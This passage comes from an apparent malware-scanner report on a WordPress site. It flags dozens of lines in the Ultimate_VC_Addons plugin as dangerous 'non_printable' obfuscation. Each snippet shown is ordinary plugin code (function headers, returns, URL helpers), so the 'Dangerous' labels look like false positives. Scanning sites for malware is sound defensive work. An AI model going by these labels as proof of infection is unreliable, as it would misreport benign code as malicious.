<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_info_table_generate_design06' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_418").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design02.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.18 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_419" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_info_table_generate_design02</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 320</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_info_table_generate_design02' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_419").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/templates/ult_tab/ult_tab_element.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 21.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_420" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$dhfont_family </span><span style="color: #007700">= </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_tab_element_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'desc_font_family'</span><span style="color: #007700">] ); if ( </span><span style="color: #DD0000">'' </span><span style="color: #007700">!= </span><span style="color: #0000BB">$dhfont_family </span><span style="color: #007700">) { </span><span style="color: #0000BB">$contain_bg </span><span style="color: #007700">.= </span><span style="color: #DD0000">'font-family:' </span><span style="color: #007700">. </span><span style="color: #0000BB">$dhfont_family </span><span style="color: #007700">. </span><span style="color: #DD0000">';'</span><span style="color: #007700">; } } if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_style' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 98</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_ultimate_font_family' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_420").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/Ultimate_VC_Addons.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.02 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 51</span><br><table id="file_421" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_load' </span><span style="color: #007700">) ) { function </span><span style="color: #0000BB">bsf_core_load</span><span style="color: #007700">() { global </span><span style="color: #0000BB">$bsf_core_version</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_core_path</span><span style="color: #007700">; if ( </span><span style="color: #0000BB">is_file</span><span style="color: #007700">( </span><span style="color: #0000BB">realpath</span><span style="color: #007700">( </span><span style="color: #0000BB">$bsf_core_path </span><span style="color: #007700">. </span><span style="color: #DD0000">'/index.php' </span><span style="color: #007700">) ) ) { include_once </span><span style="color: #0000BB">realpath</span><span style="color: #007700">( </span><span style="color: #0000BB">$bsf_core_path </span><span style="color: #007700">. </span><span style="color: #DD0000">'/index.php' </span><span style="color: #007700">); } } } </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #DD0000">'init'</span><span style="color: #007700">, </span><span style="color: #DD0000">'bsf_core_load'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">aio_move_templates</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions</span><span style="color: #007700">.</span><span style="color: #0000BB">RestrictedFunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">chmod_chmod</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">toggle_updater</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_link_init</span><span style="color: #007700">( </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$target</span><span style="color: #007700">, </span><span style="color: #0000BB">$link_title</span><span style="color: #007700">, </span><span style="color: #0000BB">$rel </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uavc_link_attr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_plugin_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1492</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_load' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1496</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_load</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">on_ultimate_vc_addons_activate</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">Filtered plugin action links</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 251</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_vc_addons_license_form_and_links</span><span style="color: #007700">( </span><span style="color: #0000BB">$links </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 253</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_bsf_inline_license_form' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">get_bsf_inline_license_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$links</span><span style="color: #007700">, </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #DD0000">'envato' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 264</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$links</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_skip_brainstorm_menu</span><span style="color: #007700">( </span><span style="color: #0000BB">$products </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 280</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_vc_addons_bsf_registration_page_url</span><span style="color: #007700">() { </span><span style="color: #FF8000">// PHPCS:Ignore WordPressVIPMinimum.Hooks.AlwaysReturnInFilter.MissingReturnStatement</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">network_admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'plugins.php?bsf-inline-license-form=6892199' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'plugins.php?bsf-inline-license-form=6892199' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uavc_bsf_registration_page_url</span><span style="color: #007700">() { </span><span style="color: #FF8000">// PHPCS:Ignore WordPressVIPMinimum.Hooks.AlwaysReturnInFilter.MissingReturnStatement</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 296</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">admin_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'admin.php?page=ultimate-product-license' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uvc_plugin_activate</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 334</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">to Plugins Page</span><span style="color: #DD0000">', '</span><span style="color: #0000BB">ultimate_vc</span><span style="color: #DD0000">' ) . '</span><span style="color: #007700"></</span><span style="color: #0000BB">a</span><span style="color: #007700">></span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_addons</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 392</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_plugins_page_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$links </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_notice_for_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_notice_for_vc_activation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 433</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_ulitmate_presets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_init_vars</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 463</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_vc_translation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 496</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_modal_menu</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 511</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">aio_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 528</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 558</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_admin_notice_for_woocommerce</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 567</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">aio_admin_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 597</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_our_element_on_page</span><span style="color: #007700">( </span><span style="color: #0000BB">$post_content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 657</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 667</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_css_path_data</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 670</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$css_path_data</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 694</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_css_rtl</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$css_rtl</span><span style="color: #007700">;</span>
</span>
